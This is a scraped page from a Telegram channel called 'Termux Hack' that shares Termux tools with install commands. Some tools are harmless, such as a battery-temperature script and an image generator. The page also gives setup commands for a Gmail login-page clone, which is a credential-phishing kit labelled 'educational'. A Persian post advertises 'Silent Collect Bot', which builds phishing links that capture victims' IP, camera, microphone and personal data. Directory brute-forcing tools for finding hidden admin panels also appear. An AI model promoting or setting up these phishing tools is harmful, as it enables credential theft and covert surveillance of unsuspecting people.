ترموکس هک | Termux Hack
15.4K subscribers
417 photos
34 videos
44 files
172 links
آموزش ترموکس

🃏 Advanced A to Z Termux - Linux ...

Tutorials :-

💻 | Termux - Linux Tutorial
🎓 | Advanced Termux - Linux Hacking
🎭 | Termux - Linux Tip & Tricks
📜 | Helpful Termux - Linux Articles

@Mr_C0de
Download Telegram
🛡 Get the temperature of the device battery.

git clone https://github.com/haithamaouati/Phoenix.git
cd Phoenix
chmod +x phoenix.sh
./phoenix.sh

Usage: ./phoenix.sh [options]

Options:
-c, --celsius Show temperature in Celsius (default if no option)

-f, --fahrenheit Show temperature in Fahrenheit

-c -f Show both Celsius and Fahrenheit

-h, --help Show this help message


The script requires the following dependencies:

termux-api: pkg install termux-api - y
jq: pkg install jq -y
bc: pkg install bc -y


⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link.

🔗 @TermuxHackTm
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
A Detailed Guide on Feroxbuster

Feroxbuster is a robust tool designed to identify directories and files on web servers using brute-force techniques. It is frequently utilized in penetration testing and security evaluations to detect concealed paths and resources.

Lab setup
Installation
Default mode
Redirects
Extensions
Result output
User agent
Filter status code
Quiet mode
Controlling threads
Custom wordlist
Disable recursion
Limit recursion depth
Force Recursion
Filter by character size
Filter by number of words
Filter by number of lines
Filter by status code using deny list
Filter by status code using allow list
Generating random User-Agent
HTTP methods


🛡 @TermuxHackTm
Please open Telegram to view this post
VIEW IN TELEGRAM
🔗 Suns-term - my own python script for .profile in termux. In this script i use TacleAPI

Change ip and port of your host in menu file

cd /settings
nvim menu.py

Or

cd /settings
nano menu.py

Start

python3 main.py

Installation
Install my-project with git.


git clone https://github.com/TheDmitryY/suns-term
python3 main.py


⚠️ For more information and use of this tool in termux visit github link of this tool.
👨‍💻  @TermuxHackTm
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
📌Admin Directory Finder is a tool designed to scan and identify directories under admin paths, such as admin/dashboard.php. It helps in security testing by detecting hidden or sensitive admin panels within a web application. Ideal for penetration testers and developers to ensure proper access control and security measures.

git clone https://github.com/tausifzaman/AdminDirectoryFinder.git && cd AdminDirectoryFinder && pip install -r requirements.txt && python3 main.py

git clone https://github.com/tausifzaman/AdminDirectoryFinder.git

cd AdminDirectoryFinder

pip install -r requirements.txt

python3 main.py

⚠️ For more information and use of this tool in termux visit github link of this tool.
👨‍💻  @TermuxHackTm
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥5
🛡Gmail Login Page Clone for Educational Purposes

pkg install -y git && git clone https://github.com/Masterdas/Gmail.git && cd Gmail && bash setup.sh

pkg update && pkg upgrade -y

git clone https://github.com/Masterdas/Gmail.git

cd Gmail && bash setup.sh

exit

cd Gmail

bash gmail.sh

⚠️ For more information and use of this tool in termux visit github link of this tool.
👨‍💻  @TermuxHackTm
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥3
⚡️Minimal, powerful AI image generation tool.

# Update package list
apt update && apt upgrade

# Install Python and Git
apt install python python-pip git

# Allow storage permission
termux-setup-storage

# Clone and setup
git clone https://github.com/VritraSecz/LucidX.git
cd LucidX
pip install -r requirements.txt

# Run
python lucidx.py


⚠️ For more information and use of this tool in termux visit github link of this tool.
👨‍💻  @TermuxHackTm
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🔥1
6 Most Common API Security Issues
🔥4
🛡 Silent Collect Bot

ربات فیشینگ همه‌ کاره

ساخت لینک فیشینگ حرفه‌ای برای دریافت آی‌پی، دوربین، میکروفون و اطلاعات کاربر در قالب‌ های متنوع و رایگان

🔒 امنیت بالا، بدون نیاز به هاست

⚙️ کاملاً رایگان و آماده استفاده

🖱 @SilentCollectBot
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3